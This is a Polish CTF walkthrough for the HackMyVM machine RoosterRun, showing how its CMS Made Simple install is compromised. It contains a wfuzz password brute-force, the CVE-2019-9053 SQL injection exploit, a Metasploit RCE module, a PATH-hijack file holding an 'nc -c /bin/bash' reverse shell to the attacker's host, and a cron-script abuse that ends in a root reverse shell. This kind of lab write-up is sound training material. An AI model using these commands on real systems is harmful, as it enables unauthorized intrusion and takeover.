RoosterRun - cromiphi

00. Metainfo

Nazwa: RoosterRun
Autor: cromiphi
Wypuszczony: 2023-11-28
Ściągnij: HackMyVM
Poziom: Łatwy
System: Linux
Nauczysz się: Szybkiego biegania kogutów ;) CVE, RevShell, bruteforce, Sztuczki Bash

01. Wstęp

Kolejna maszynka od Cromiphi. Jest to znany twórcy maszynek do łamania, które można znaleźć na HackMyVM. To miała być łatwa maszynka, jednak zaliczyłbym ją raczej do średnich. Ma swoje ciekawe momenty, które mogą przystopować na dłużej. Do tego nie jest na parę minut, jakby się mogło komuś wydawać. Jeżeli zaczynasz zabawę z łamananiem, to bez wskazówek możesz się długo z nią męczyć (ale warto). Ip maszyny, jak zwykle wykryłem dzięki programowi Netdiscover, ale ostatnio twórcy sami umieszczają adres na ekranie konsoli obrazu.

01

02. Co to za maszyna?

Po wstępnym skanowaniu Nmapem:

msf6 > db_nmap 172.16.1.227
# [*] Nmap: Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-28 22:20 CET
# [*] Nmap: Nmap scan report for rooSter-Run.lan (172.16.1.227)
# [*] Nmap: Host is up (0.00081s latency).
# [*] Nmap: Not shown: 998 closed tcp ports (reset)
# [*] Nmap: PORT  STATE SERVICE
# [*] Nmap: 22/tcp open ssh
# [*] Nmap: 80/tcp open http
# [*] Nmap: MAC Address: 08:00:27:82:3B:50 (Oracle VirtualBox virtual NIC)
# [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
msf6 > hosts 

# Hosts
# =====

# address    mac        name       os_name os_flavor os_sp purpose info comments
# -------    ---        ----       ------- --------- ----- ------- ---- --------
# 172.16.1.227 08:00:27:82:3b:50 rooSter-Run.lan Unknown          device

widzimy, że mamy otwarte porty:

 • 22/tcp - SSH
 • 80/tcp - Apache WWW

Czyli standard. Wchodząc przez przeglądarkę jest jakiś CMS - CMS - Made simple. Trochę połaziłem po stronie, ale nic ciekawego nie było, co by się potem przydało. Feroxbuster i Dirsearch wyrzuciły dużo linków, ale znalazły mało przydatnych rzeczy (no, może poza linkiem do logowania i wersją CMS-a). A to też jest ważna wskazówka (że prawie nic się nie znaleziono). Później poszukałem na necie i zobaczyłem, że główny użytkownik to admin(jak zwykle :smiley: ). Logowanie typu admin/admin itp. oczywiście nie działało, więc trzeba było inaczej znaleźć hasełko.

02

03. Szukanie hasełka dla admina

03a. (bruteforce)

Do łamania haseł online dobry jest Ffuf i Wfuzz. Niestety w Ffuf trzeba podawać jakieś dodatkowe parametry nagłówka, żeby dobrze znajdował. Wfuzz tego problemu już nie ma. Dodatkowa komplikacja w maszynie jest z umieszczeniem hasła na dalekiej pozycji.(używałem rockyou.txt), więc trochę czasu minie zanim program je znajdzie.

wfuzz -w /usr/share/wordlists/rockyou.txt -d 'username=admin&password=FUZZ&loginsubmit=Submit' -u http://172.16.1.227/admin/login.php --hh 4569
# /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
# ********************************************************
# * Wfuzz 3.1.0 - The Web Fuzzer             *
# ********************************************************

# Target: http://172.16.1.227/admin/login.php
# Total requests: 14344392

# =====================================================================
# ID      Response  Lines  Word    Chars    #Payload                                       
# =====================================================================

# 000019993:  302    0 L   0 W    0 Ch    
# "hasełko"

03b. CVE-2019-9053

Wcześniej znalazłem exploit CVE-2019-9053, ale mi się nie uruchomił. Powodem był brak biblioteki Termcolor do Pythona 2 (w którym uruchamia się skrypt). Niestety Python 2 powoli wychodzi z użycia, ale stare exploity zostały. Poprawiłem to (skopiowałem plik termcolor.py z katalogu /usr/lib/python3/dist-packages do /usr/lib/python2) i odpaliłem skrypt z ciekawości. Poniżej pokazuje jak go znalazłem i jego efekty działania.

searchsploit cms made simple sql
# -------------------------------------------------------------------------------------------------------------------- ---------------------------------
# Exploit Title                                                   | Path
# -------------------------------------------------------------------------------------------------------------------- ---------------------------------
# CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection                               | php/webapps/29941.txt
# CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection                                | php/webapps/4810.txt
# CMS Made Simple < 2.2.10 - SQL Injection                                      | php/webapps/46635.py
python2 46635.py -u http://172.16.1.227/ --crack -w /usr/share/wordlists/rockyou.txt
# [+] Salt for password found: 1a0112229fbd699d
# [+] Username found: admin
# [+] Email found: admin@localhost.com
# [+] Password found: 4f943036486b9ad48890b2efbf7735a8
# [+] Password cracked: hasełko

04. Podatna wersja CMS Made Simple

Jak wcześniej napisałem jest to CMS Made Simple, a jego wersja to 2.2.9.1. Szukając następnych podatności, tym razem już w Metasploicie znalazłem coś takiego:

msf6 > search CMS Made Simple

# Matching Modules
# ================

#  # Name                      Disclosure Date Rank    Check Description
#  - ----                      --------------- ----    ----- -----------
#  0 exploit/multi/http/cmsms_showtime2_rce     2019-03-11    normal   Yes  CMS Made Simple (CMSMS) Showtime2 File Upload RCE
#  1 exploit/multi/http/cmsms_upload_rename_rce   2018-07-03    excellent Yes  CMS Made Simple Authenticated RCE via File Upload/Copy
#  2 exploit/multi/http/cmsms_object_injection_rce 2019-03-26    normal   Yes  CMS Made Simple Authenticated RCE via object injection


Interact with a module by name or index. For example info 2, use 2 or use exploit/multi/http/cmsms_object_injection_rce

Wybieramy multi/http/cmsms_object_injection_rce:

msf6 exploit(multi/http/cmsms_object_injection_rce) > set username admin
# username => admin
msf6 exploit(multi/http/cmsms_object_injection_rce) > set password hasełko
# password => hasełko
msf6 exploit(multi/http/cmsms_object_injection_rce) > set rhosts 172.16.1.227
# rhosts => 172.16.1.227
msf6 exploit(multi/http/cmsms_object_injection_rce) > run -j
# [*] Exploit running as background job 0.
# [*] Exploit completed, but no session was created.

# [*] Started reverse TCP handler on 172.16.1.89:4444 
# msf6 exploit(multi/http/cmsms_object_injection_rce) > [*] Running automatic check ("set AutoCheck false" to disable)
# [+] The target appears to be vulnerable.
# [*] Sending stage (39927 bytes) to 172.16.1.227
# [+] Deleted zEAhHHutjN.php
# [*] Meterpreter session 1 opened (172.16.1.89:4444 -> 172.16.1.227:41228) at 2023-11-28 23:06:33 +0100

W w/w eksploicie jest wymagane podania loginu i hasła, ale za to mamy dostęp do Shella.

05. Użytkownik www-data

Wchodząc na shella działamy na użytkowniku www-data, ale jest jeszcze drugi “ludź” w katalogu /etc/home - matthieu. Trochę autor powrzucał na maszynę króliczych nor i różnej maści zmyłek, ale ważny jest skrypt StaleFinder i katalog /usr/local/bin. Jest on pusty, co nasuwa pewne przypuszczenie. A znalazłem ten katalog za pomocą program Lse. Wystarczy ściągnąć i uruchomić.

wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" && chmod 700 lse.sh && ./lse.sh -l 1
# ...
# [!] fst160 Can we write to critical files?................................. nope
# [!] fst170 Can we write to critical directories?........................... nope
# [!] fst180 Can we write to directories from PATH defined in /etc?.......... yes!
# ---
# drwxrwx---+ 2 root root 4096 Nov 28 23:32 /usr/local/bin
# ---
# [!] fst190 Can we read any backup?......................................... nope
# [!] fst200 Are there possible credentials in any shell history file?....... nope
# [!] fst210 Are there NFS exports with 'no_root_squash' option?............. nope
# [*] fst220 Are there NFS exports with 'no_all_squash' option?.............. nope
# ...

Przyjrzyjmy się bardziej /usr/local/bin:

getfacl /usr/local/bin
# getfacl: Removing leading '/' from absolute path names
# file: usr/local/bin
# owner: root
# group: root
# user::rwx
# user:www-data:rwx
# user:matthieu:r-x
# group::---
# mask::rwx
# other::---

Jak widzimy, użytkownik www-data ma cały dostęp do tego katalogu. Skrypt StaleFinder zaś wygląda tak:

#!/usr/bin/env bash

for file in ~/*; do
  if [[ -f $file ]]; then
    if [[ ! -s $file ]]; then
      echo "$file is empty."
    fi
    
    if [[ $(find "$file" -mtime +365 -print) ]]; then
      echo "$file hasn't been modified for over a year."
    fi
  fi
done

Sprawdźmy kolejność przeszukiwania katalogów przez Basha(zakładając, że matthieu ma tak samo):

www-data@rooSter-Run:/home/matthieu$ echo $PATH
# echo $PATH
# /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Zobaczmy gdzie jest Bash:

whereis bash
# bash: /usr/bin/bash /usr/share/man/man1/bash.1.gz

Katalog /usr/bin/ jest za /usr/local/bin, więc jeżeli wrzucimy nasz plik Bash do katalogu /usr/local/bin to się uruchomi pierwszy. Zawartość Basha jego to oczywiście Reverse Shell.

Zawartość pliku:

nc -c /bin/bash 172.16.1.89 12345

05. Użytkownik matthieu

Będąc już na koncie matthieu odpalamy wcześniej pobrany program Lse. Znalazł interesujący nas fragment:

03

06. Ruster Run

I tu zaczynają się schody, oraz ten wyścig kogutów, które zabrały mi troche czasu. Pomógł mi zaś Ethicrash i gdzieś widziałem wcześniej podobną sztuczkę na maszynie od RiJaba1 (niekoniecznie to działało tak samo, ale…), ale po kolei. W katalogu /opt/maintenance mamy skrypt o nazwie backup.sh, który jest wykonywany co minutę przez Crontab z konta Roota.

#!/bin/bash

PROD="/opt/maintenance/prod-tasks"
PREPROD="/opt/maintenance/pre-prod-tasks"


for file in "$PREPROD"/*; do
 if [[ -f $file && "${file##*.}" = "sh" ]]; then
  cp "$file" "$PROD"
 else
  rm -f ${file}
 fi
done

for file in "$PROD"/*; do
 if [[ -f $file && ! -O $file ]]; then
 rm ${file}
 fi
done

/usr/bin/run-parts /opt/maintenance/prod-tasks

Z katalogu /opt/maintenance/pre-prod-tasks są przerzucane pliki do katalogu /opt/maintenance/prod-tasks, a następnie za pomocą komendy run-parts uruchamiane są wszystkie programy. Wydaje się to proste. Wrzućmy pliki, a skrypt skopiuje z uprawnieniami roota i je wykona. Niestety, skrypt kopiuje tylko pliki z rozszerzeniem .sh, a tych plików tutaj nie uruchamia komenda run-parts. Będąc w katalogu /opt/maintenance/prod-tasks kopiowałem pliki komendą cp, ale plik zmieniał właściciela na matthieu, a na tym nam nie zależy. Jednak później spróbowałem komendą mv i… jest sukces. Plik nie zmienił właściciela, był nim root, a na roocie można było odpalić kolejną konsolkę. Poniżej jest skrypt który to uruchomi i wrzuci plik file.sh do katalogu /opt/maintenance/pre-prod-tasks. Przy okazji odpal u siebie następną konsolkę nasłuchującą. Poniżej skrypt:

#!/bin/sh
PROD="/opt/maintenance/prod-tasks"
PREPROD="/opt/maintenance/pre-prod-tasks"
FILE=file.sh
echo '#!/bin/sh' > $PREPROD/file.sh
echo 'nc -c /bin/sh 172.16.1.89 44444' >> $PREPROD/file.sh
chmod +x $PREPROD/file.sh

Później wejdź do katalogu /opt/maintenance/prod-tasks i czekaj aż tam będzie file.sh. Następną operacją jest zmiana nazwy komendą mv file.sh file. Po niecałej minucie powinieneś mieć dostęp do konta root.

Zostaw komentarz